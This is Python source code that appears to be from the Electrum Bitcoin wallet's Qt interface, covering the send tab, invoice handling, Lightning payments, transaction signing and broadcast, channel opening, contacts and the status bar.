    msg = _('Amount to be sent.') + '\n\n' \
          + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
          + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
          + _('Keyboard shortcut: type "!" to send all your coins.')
    amount_label = HelpLabel(_('Amount'), msg)
    grid.addWidget(amount_label, 3, 0)
    grid.addWidget(self.amount_e, 3, 1)
    self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_send_e.setVisible(False)
    grid.addWidget(self.fiat_send_e, 3, 2)
    # Freeze/unfreeze the fiat field together with the BTC amount field.
    self.amount_e.frozen.connect(
        lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
    self.max_button = EnterButton(_("Max"), self.spend_max)
    self.max_button.setFixedWidth(100)
    self.max_button.setCheckable(True)
    grid.addWidget(self.max_button, 3, 3)
    self.save_button = EnterButton(_("Save"), self.do_save_invoice)
    self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
    self.clear_button = EnterButton(_("Clear"), self.do_clear)
    buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.clear_button)
    buttons.addWidget(self.save_button)
    buttons.addWidget(self.send_button)
    grid.addLayout(buttons, 6, 1, 1, 4)
    # "!" shortcut in the amount field triggers spend-max.
    self.amount_e.shortcut.connect(self.spend_max)
    def reset_max(text):
        # Any manual edit cancels "Max" mode.
        self.max_button.setChecked(False)
        # NOTE(review): `enable` is computed but unused since the
        # setEnabled call below is commented out.
        enable = not bool(text) and not self.amount_e.isReadOnly()
        #self.max_button.setEnabled(enable)
    self.amount_e.textEdited.connect(reset_max)
    self.fiat_send_e.textEdited.connect(reset_max)
    self.set_onchain(False)
    self.invoices_label = QLabel(_('Send queue'))
    from .invoice_list import InvoiceList
    self.invoice_list = InvoiceList(self)
    vbox0 = QVBoxLayout()
    vbox0.addLayout(grid)
    hbox = QHBoxLayout()
    hbox.addLayout(vbox0)
    hbox.addStretch(1)
    w = QWidget()
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.invoices_label)
    vbox.addWidget(self.invoice_list)
    vbox.setStretchFactor(self.invoice_list, 1000)
    w.searchable_list = self.invoice_list
    # Let plugins extend the send tab grid.
    run_hook('create_send_tab', grid)
    return w
def spend_max(self):
    """Fill the amount field with the maximum spendable amount.

    Builds a trial max-spend transaction; when dynamic fees are
    unavailable or funds are short it retries with a zero fee so the user
    can still pick a lower fee manually.  Plugin-added extra fees are
    subtracted from the displayed amount.
    """
    if run_hook('abort_send', self):
        return
    outputs = self.payto_e.get_outputs(True)
    if not outputs:
        return
    make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
        coins=self.get_coins(),
        outputs=outputs,
        fee=fee_est,
        is_sweep=False)
    try:
        try:
            tx = make_tx(None)
        except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
            # Check if we had enough funds excluding fees,
            # if so, still provide opportunity to set lower fees.
            tx = make_tx(0)
    except MultipleSpendMaxTxOutputs as e:
        self.max_button.setChecked(False)
        self.show_error(str(e))
        return
    except NotEnoughFunds as e:
        # Even the zero-fee attempt failed: truly not enough funds.
        self.max_button.setChecked(False)
        text = self.get_text_not_enough_funds_mentioning_frozen()
        self.show_error(text)
        return
    self.max_button.setChecked(True)
    amount = tx.output_value()
    # Plugins (e.g. trustedcoin) may add an extra fee output.
    __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
    amount_after_all_fees = amount - x_fee_amount
    self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
    """Return the pay-to string for contact *key*: "label <key>" for
    plain address contacts, otherwise the key itself."""
    _type, label = self.contacts.get(key)
    if _type == 'address':
        return label + ' <' + key + '>'
    return key
def update_completions(self):
    """Rebuild the pay-to auto-completion list from the contact book."""
    payto_strings = [self.get_contact_payto(key) for key in self.contacts]
    self.completions.setStringList(payto_strings)
@protected
def protect(self, func, args, password):
    # Generic password-gated dispatcher: the @protected decorator supplies
    # the `password` argument (prompting the user when the wallet is
    # encrypted), then we forward it to the wrapped callable.
    return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
    """Collect outputs to pay: from the active payment request when one
    is set, otherwise parsed from the 'Pay to' field (honouring Max)."""
    if self.payment_request:
        return self.payment_request.get_outputs()
    return self.payto_e.get_outputs(self.max_button.isChecked())
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
    """Validate on-chain *outputs*; returns True when there is a problem.

    An error dialog is shown for the first problem found: an empty
    output list, a missing scriptpubkey, or a missing value.
    """
    if not outputs:
        self.show_error(_('No outputs'))
        return True
    for output in outputs:
        if output.scriptpubkey is None:
            self.show_error(_('Bitcoin Address is None'))
            return True
        if output.value is None:
            self.show_error(_('Invalid Amount'))
            return True
    return False  # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
    """Returns whether there are errors.
    Also shows error dialog to user if so.
    """
    pr = self.payment_request
    if pr:
        if pr.has_expired():
            self.show_error(_('Payment request has expired'))
            return True
    if not pr:
        # Free-form pay-to text: surface parse errors collected by the editor.
        errors = self.payto_e.get_errors()
        if errors:
            if len(errors) == 1 and not errors[0].is_multiline:
                err = errors[0]
                self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
                                  f"{err.line_content[:40]}...\n\n"
                                  f"{err.exc!r}")
            else:
                self.show_warning(_("Invalid Lines found:") + "\n\n" +
                                  '\n'.join([_("Line #") +
                                             f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
                                             for err in errors]))
            return True
        # Alias that failed the DNSSEC check: warn, let the user decide.
        if self.payto_e.is_alias and self.payto_e.validated is False:
            alias = self.payto_e.toPlainText()
            msg = _('WARNING: the alias "{}" could not be validated via an additional '
                    'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
            msg += _('Do you wish to continue?')
            if not self.question(msg):
                return True
    return False  # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
    """Confirm and pay a BOLT11 invoice on the wallet worker thread.

    Raises when no amount is available; asks the user to confirm the
    (satoshi-truncated) amount before dispatching the payment.
    """
    if amount_msat is None:
        raise Exception("missing amount for LN invoice")
    amount_sat = Decimal(amount_msat) / 1000
    # FIXME this is currently lying to user as we truncate to satoshis
    msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
    if not self.question(msg):
        return
    # Clear the form and persist the invoice before paying.
    self.save_pending_invoice()
    attempts = LN_NUM_PAYMENT_ATTEMPTS
    def task():
        # Runs on the wallet's worker thread, not the GUI thread.
        self.wallet.lnworker.pay(invoice, amount_msat=amount_msat, attempts=attempts)
    self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
    """Handle a receive-request status event; ignore foreign wallets."""
    if wallet != self.wallet:
        return
    request = self.wallet.receive_requests.get(key)
    if request is None:
        return
    self.request_list.update_item(key, request)
    self.request_list.update()
    if status == PR_PAID:
        # Payment arrived: notify the user and schedule a wallet refresh.
        self.notify(_('Payment received') + '\n' + key)
        self.need_update.set()
def on_invoice_status(self, wallet, key):
    """Handle an invoice status event; ignore foreign wallets."""
    if wallet != self.wallet:
        return
    invoice = self.wallet.get_invoice(key)
    if invoice is None:
        return
    self.invoice_list.update_item(key, invoice)
    self.invoice_list.update()
def on_payment_succeeded(self, wallet, key):
    """Notify the user of a completed outgoing payment and refresh."""
    self.notify(_('Payment succeeded') + '\n\n' + self.wallet.get_label(key))
    self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
    """Surface a failed outgoing payment to the user with its reason."""
    message = _('Payment failed') + '\n\n' + reason
    self.show_error(message)
def read_invoice(self):
    """Build an invoice object from the send tab's current contents.

    Returns an LNInvoice (Lightning mode) or an on-chain invoice, or
    None when validation fails (an error dialog is shown in that case).
    """
    if self.check_send_tab_payto_line_and_show_errors():
        return
    if not self._is_onchain:
        invoice_str = self.payto_e.lightning_invoice
        if not invoice_str:
            return
        if not self.wallet.has_lightning():
            self.show_error(_('Lightning is disabled'))
            return
        invoice = LNInvoice.from_bech32(invoice_str)
        if invoice.get_amount_msat() is None:
            # Amountless invoice: take the amount from the amount field.
            amount_sat = self.amount_e.get_amount()
            if amount_sat:
                invoice.amount_msat = int(amount_sat * 1000)
            else:
                self.show_error(_('No amount'))
                return
        return invoice
    else:
        outputs = self.read_outputs()
        if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
            return
        message = self.message_e.text()
        return self.wallet.create_invoice(
            outputs=outputs,
            message=message,
            pr=self.payment_request,
            URI=self.payto_URI)
def do_save_invoice(self):
    """Read the invoice from the send tab and persist it (Save button)."""
    self.pending_invoice = self.read_invoice()
    if self.pending_invoice:
        self.save_pending_invoice()
def save_pending_invoice(self):
    """Persist the pending invoice (if any) and reset the send form."""
    invoice = self.pending_invoice
    if not invoice:
        return
    self.do_clear()
    self.wallet.save_invoice(invoice)
    self.invoice_list.update()
    self.pending_invoice = None
def do_pay(self):
    """Read the invoice from the send tab and start paying it (Pay button)."""
    self.pending_invoice = self.read_invoice()
    if self.pending_invoice:
        self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
    """Pay several on-chain invoices together in a single transaction."""
    combined_outputs = [out for invoice in invoices for out in invoice.outputs]
    self.pay_onchain_dialog(self.get_coins(), combined_outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
    """Dispatch payment of *invoice* according to its type."""
    invoice_type = invoice.type
    if invoice_type == PR_TYPE_LN:
        # Lightning: hand the bech32 invoice to the LN payment path.
        assert isinstance(invoice, LNInvoice)
        self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
    elif invoice_type == PR_TYPE_ONCHAIN:
        # On-chain: build and confirm a transaction for the outputs.
        assert isinstance(invoice, OnchainInvoice)
        self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
    else:
        raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
    """Return coins to spend: the manual UTXO selection when coin control
    is active, otherwise all spendable coins from the wallet."""
    selected = self.get_manually_selected_coins()
    if selected is not None:
        return selected
    return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
    """Return the user's manual coin selection, or None.

    None means coin control is not in use, while an empty sequence means
    the user explicitly selected nothing.
    """
    return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
    """Build the "Not enough funds" message, mentioning frozen balance
    when some funds are frozen."""
    text = _("Not enough funds")
    frozen_bal = sum(self.wallet.get_frozen_balance())
    if frozen_bal:
        frozen_str = self.format_amount(frozen_bal).strip()
        text += " ({} {} {})".format(frozen_str, self.base_unit(), _("are frozen"))
    return text
def pay_onchain_dialog(
        self, inputs: Sequence[PartialTxInput],
        outputs: List[PartialTxOutput], *,
        external_keypairs=None) -> None:
    """Run the on-chain payment flow: confirm dialog, sign, broadcast.

    external_keypairs (when set) means a sweep: signing uses those keys
    directly instead of the wallet keystore.
    """
    # trustedcoin requires this
    if run_hook('abort_send', self):
        return
    is_sweep = bool(external_keypairs)
    make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
        coins=inputs,
        outputs=outputs,
        fee=fee_est,
        is_sweep=is_sweep)
    output_values = [x.value for x in outputs]
    # '!' denotes a spend-max output; at most one is allowed.
    if output_values.count('!') > 1:
        self.show_error(_("More than one output set to spend max"))
        return
    output_value = '!' if '!' in output_values else sum(output_values)
    d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
    if d.not_enough_funds:
        # Check if we had enough funds excluding fees,
        # if so, still provide opportunity to set lower fees.
        if not d.have_enough_funds_assuming_zero_fees():
            text = self.get_text_not_enough_funds_mentioning_frozen()
            self.show_message(text)
            return
    # shortcut to advanced preview (after "enough funds" check!)
    if self.config.get('advanced_preview'):
        self.preview_tx_dialog(make_tx=make_tx,
                               external_keypairs=external_keypairs)
        return
    cancelled, is_send, password, tx = d.run()
    if cancelled:
        return
    if is_send:
        # Persist the pending invoice before signing/broadcasting.
        self.save_pending_invoice()
        def sign_done(success):
            if success:
                self.broadcast_or_show(tx)
        self.sign_tx_with_password(tx, callback=sign_done, password=password,
                                   external_keypairs=external_keypairs)
    else:
        # User chose "preview" in the confirm dialog.
        self.preview_tx_dialog(make_tx=make_tx,
                               external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
    """Open the advanced (non-modal) transaction preview dialog."""
    dialog = PreviewTxDialog(make_tx=make_tx,
                             external_keypairs=external_keypairs,
                             window=self)
    dialog.show()
def broadcast_or_show(self, tx: Transaction):
    """Broadcast *tx* when complete and online; otherwise show it in a
    dialog (with an error message when offline)."""
    if tx.is_complete():
        if self.network:
            self.broadcast_transaction(tx)
            return
        self.show_error(_("You can't broadcast a transaction without a live network connection."))
    self.show_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
    # The @protected decorator supplies `password` (prompting the user
    # when needed); then delegate to the threaded signing helper.
    self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
    '''Sign the transaction in a separate thread. When done, calls
    the callback with a success code of True or False.
    '''
    def on_success(result):
        callback(True)
    def on_failure(exc_info):
        self.on_error(exc_info)
        callback(False)
    # Plugins (trustedcoin) may wrap the success handler, e.g. to add a
    # second signature step.
    on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
    if external_keypairs:
        # can sign directly
        task = partial(tx.sign, external_keypairs)
    else:
        task = partial(self.wallet.sign_transaction, tx, password)
    msg = _('Signing transaction...')
    # WaitingDialog runs `task` off the GUI thread and dispatches the
    # success/failure handler back on completion.
    WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
    """Broadcast *tx* on a background thread and report the result.

    When a payment request (BIP70-style) is active, also sends the
    payment message to the merchant and waits for its ACK.
    """
    def broadcast_thread():
        # non-GUI thread
        pr = self.payment_request
        if pr and pr.has_expired():
            self.payment_request = None
            return False, _("Invoice has expired")
        try:
            self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
        except TxBroadcastError as e:
            return False, e.get_message_for_gui()
        except BestEffortRequestFailed as e:
            return False, repr(e)
        # success
        txid = tx.txid()
        if pr:
            self.payment_request = None
            refund_address = self.wallet.get_receiving_address()
            coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
            fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
            ack_status, ack_msg = fut.result(timeout=20)
            self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
        return True, txid
    # Capture current TL window; override might be removed on return
    parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
    def broadcast_done(result):
        # GUI thread
        if result:
            success, msg = result
            if success:
                parent.show_message(_('Payment sent.') + '\n' + msg)
                self.invoice_list.update()
            else:
                msg = msg or ''
                parent.show_error(msg)
    WaitingDialog(self, _('Broadcasting transaction...'),
                  broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
    """Return a tx factory (fee_est -> funding tx) for opening a channel.

    Coins are restricted to non-local ones, captured once up front.
    """
    coins = self.get_coins(nonlocal_only=True)
    def make_tx(fee_est):
        return self.wallet.lnworker.mktx_for_open_channel(
            coins=coins,
            funding_sat=funding_sat,
            fee_est=fee_est)
    return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
    """Open a Lightning channel: confirm the funding tx, then run the
    channel-establishment flow on a background thread.

    connect_str: remote node connection string; funding_sat may be '!'
    (max) and is re-read from the built funding tx.
    """
    try:
        extract_nodeid(connect_str)
    except ConnStringFormatError as e:
        self.show_error(str(e))
        return
    # use ConfirmTxDialog
    # we need to know the fee before we broadcast, because the txid is required
    make_tx = self.mktx_for_open_channel(funding_sat)
    d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
    # disable preview button because the user must not broadcast tx before establishment_flow
    d.preview_button.setEnabled(False)
    cancelled, is_send, password, funding_tx = d.run()
    if not is_send:
        return
    if cancelled:
        return
    # read funding_sat from tx; converts '!' to int value
    funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
    def task():
        # Runs off the GUI thread (WaitingDialog below).
        return self.wallet.lnworker.open_channel(connect_str=connect_str,
                                                 funding_tx=funding_tx,
                                                 funding_sat=funding_sat,
                                                 push_amt_sat=push_amt,
                                                 password=password)
    def on_success(args):
        chan, funding_tx = args
        n = chan.constraints.funding_txn_minimum_depth
        message = '\n'.join([
            _('Channel established.'),
            _('Remote peer ID') + ':' + chan.node_id.hex(),
            _('This channel will be usable after {} confirmations').format(n)
        ])
        if not funding_tx.is_complete():
            message += '\n\n' + _('Please sign and broadcast the funding transaction')
        self.show_message(message)
        if not funding_tx.is_complete():
            # Partially-signed funding tx: hand it to the user to finish.
            self.show_transaction(funding_tx)
    def on_failure(exc_info):
        type_, e, traceback = exc_info
        self.show_error(_('Could not open channel: {}').format(repr(e)))
    WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
    """Modal multiple-choice prompt; returns the chosen index or None.

    Needed by QtHandler for hardware wallets.
    """
    dialog = WindowModalDialog(self.top_level_window())
    clayout = ChoicesLayout(msg, choices)
    vbox = QVBoxLayout(dialog)
    vbox.addLayout(clayout.layout())
    vbox.addLayout(Buttons(OkButton(dialog)))
    if dialog.exec_():
        return clayout.selected_index()
    return None
def lock_amount(self, b: bool) -> None:
    # Freeze/unfreeze the amount field; the Max button is only usable
    # while the amount is editable.
    self.amount_e.setFrozen(b)
    self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
    """Put the send tab into read-only "fetching payment request" mode."""
    self.show_send_tab()
    self.payto_e.is_pr = True
    for field in (self.payto_e, self.message_e):
        field.setFrozen(True)
    self.lock_amount(True)
    self.payto_e.setText(_("please wait..."))
    return True
def delete_invoices(self, keys):
    """Delete the given invoices from the wallet and refresh the list."""
    for invoice_key in keys:
        self.wallet.delete_invoice(invoice_key)
    self.invoice_list.update()
def payment_request_ok(self):
    """Populate the send tab from a successfully verified payment request.

    Already-paid requests just clear the form; otherwise the pay-to,
    amount and description fields are filled from the request and the
    pay-to line is colored by expiry state.
    """
    pr = self.payment_request
    if not pr:
        return
    key = pr.get_id()
    invoice = self.wallet.get_invoice(key)
    if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
        self.show_message("invoice already paid")
        self.do_clear()
        self.payment_request = None
        return
    self.payto_e.is_pr = True
    # Color the pay-to line: green while valid, "expired" style otherwise.
    if not pr.has_expired():
        self.payto_e.setGreen()
    else:
        self.payto_e.setExpired()
    self.payto_e.setText(pr.get_requestor())
    self.amount_e.setAmount(pr.get_amount())
    self.message_e.setText(pr.get_memo())
    # signal to set fee
    self.amount_e.textEdited.emit("")
def payment_request_error(self):
    """Show the failed payment request's error and reset the send tab."""
    failed_pr = self.payment_request
    if failed_pr:
        self.show_message(failed_pr.error)
        self.payment_request = None
        self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
    """Handle an incoming payment request: store it, verify it, and emit
    the matching ok/error signal (handlers run on the GUI thread)."""
    self.set_onchain(True)
    self.payment_request = request
    verified = self.payment_request.verify(self.contacts)
    if verified:
        self.payment_request_ok_signal.emit()
    else:
        self.payment_request_error_signal.emit()
    def parse_lightning_invoice(self, invoice):
        """Parse ln invoice, and prepare the send tab for it.

        Raises LnDecodeException if *invoice* cannot be decoded.
        """
        try:
            lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
        except Exception as e:
            raise LnDecodeException(e) from e
        pubkey = bh2u(lnaddr.pubkey.serialize())
        # the 'd' tag carries the invoice description, if present
        for k,v in lnaddr.tags:
            if k == 'd':
                description = v
                break
        else:
            description = ''
        self.payto_e.setFrozen(True)
        self.payto_e.setText(pubkey)
        self.message_e.setText(description)
        if lnaddr.get_amount_sat() is not None:
            self.amount_e.setAmount(lnaddr.get_amount_sat())
        #self.amount_e.textEdited.emit("")
        self.set_onchain(False)
    def set_onchain(self, b):
        """Record whether the send tab is in on-chain mode; Max only applies on-chain."""
        self._is_onchain = b
        self.max_button.setEnabled(b)
    def pay_to_URI(self, URI):
        """Fill the send tab from a BIP21 'bitcoin:' URI.

        If the URI carries an 'r' parameter (or an embedded signed request),
        a BIP70 payment request will be fetched and handled via on_pr instead.
        """
        if not URI:
            return
        try:
            out = util.parse_URI(URI, self.on_pr)
        except InvalidBitcoinURI as e:
            self.show_error(_("Error parsing URI") + f":\n{e}")
            return
        self.show_send_tab()
        self.payto_URI = out
        r = out.get('r')
        sig = out.get('sig')
        name = out.get('name')
        if r or (name and sig):
            # a payment request will arrive asynchronously; freeze the tab
            self.prepare_for_payment_request()
            return
        address = out.get('address')
        amount = out.get('amount')
        label = out.get('label')
        message = out.get('message')
        # use label as description (not BIP21 compliant)
        if label and not message:
            message = label
        if address:
            self.payto_e.setText(address)
        if message:
            self.message_e.setText(message)
        if amount:
            self.amount_e.setAmount(amount)
            self.amount_e.textEdited.emit("")
    def do_clear(self):
        """Reset the send tab to its empty, unfrozen default state."""
        self.max_button.setChecked(False)
        self.payment_request = None
        self.payto_URI = None
        self.payto_e.is_pr = False
        self.set_onchain(False)
        for e in [self.payto_e, self.message_e, self.amount_e]:
            e.setText('')
            e.setFrozen(False)
        self.update_status()
        # let plugins react to the reset
        run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
    def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
        """(Un)freeze the given UTXOs in the wallet and refresh the coins view."""
        self.wallet.set_frozen_state_of_coins(utxos, freeze)
        self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
    def create_addresses_tab(self):
        """Build the Addresses tab, restoring toolbar visibility from config."""
        from .address_list import AddressList
        self.address_list = l = AddressList(self)
        toolbar = l.create_toolbar(self.config)
        toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
        l.show_toolbar(toolbar_shown)
        return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
    def remove_address(self, addr):
        """Delete *addr* from the wallet after user confirmation."""
        if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
            return
        try:
            self.wallet.delete_address(addr)
        except UserFacingException as e:
            self.show_error(str(e))
        else:
            self.need_update.set()  # history, addresses, coins
            self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
    def set_contact(self, label, address):
        """Add/update a contact (address -> label); returns True on success."""
        if not is_address(address):
            self.show_error(_('Invalid Address'))
            self.contact_list.update()  # Displays original unchanged value
            return False
        self.contacts[address] = ('address', label)
        self.contact_list.update()
        self.history_list.update()
        self.update_completions()
        return True
    def delete_contacts(self, labels):
        """Remove the given contact keys after confirmation and refresh views."""
        if not self.question(_("Remove {} from your list of contacts?")
                             .format(" + ".join(labels))):
            return
        for label in labels:
            self.contacts.pop(label)
        self.history_list.update()
        self.contact_list.update()
        self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
    def update_console(self):
        """(Re)populate the console namespace with wallet objects and command wrappers."""
        console = self.console
        console.history = self.wallet.db.get("qt-console-history", [])
        console.history_index = len(console.history)
        console.updateNamespace({
            'wallet': self.wallet,
            'network': self.network,
            'plugins': self.gui_object.plugins,
            'window': self,
            'config': self.config,
            'electrum': electrum,
            'daemon': self.gui_object.daemon,
            'util': util,
            'bitcoin': bitcoin,
            'lnutil': lnutil,
        })
        c = commands.Commands(
            config=self.config,
            daemon=self.gui_object.daemon,
            network=self.network,
            callback=lambda: self.console.set_json(True))
        methods = {}
        def mkfunc(f, method):
            # binds 'method' per call (avoids the late-binding closure pitfall of
            # a bare lambda in the loop below) and injects the wallet + password
            # prompt into every command invocation
            return lambda *args, **kwargs: f(method,
                                             args,
                                             self.password_dialog,
                                             **{**kwargs, 'wallet': self.wallet})
        for m in dir(c):
            # skip private names and attributes already exposed directly above
            if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
            methods[m] = mkfunc(c._run, m)
        console.updateNamespace(methods)
    def create_status_bar(self):
        """Build the main status bar: balance label, search box, and the
        update/password/preferences/seed/lightning/network buttons."""
        sb = QStatusBar()
        sb.setFixedHeight(35)
        self.balance_label = QLabel("Loading wallet...")
        self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
        self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
        sb.addWidget(self.balance_label)
        # hidden by default; revealed by toggle_search
        self.search_box = QLineEdit()
        self.search_box.textChanged.connect(self.do_search)
        self.search_box.hide()
        sb.addPermanentWidget(self.search_box)
        self.update_check_button = QPushButton("")
        self.update_check_button.setFlat(True)
        self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
        self.update_check_button.setIcon(read_QIcon("update.png"))
        self.update_check_button.hide()
        sb.addPermanentWidget(self.update_check_button)
        self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
        sb.addPermanentWidget(self.password_button)
        sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
        self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
        sb.addPermanentWidget(self.seed_button)
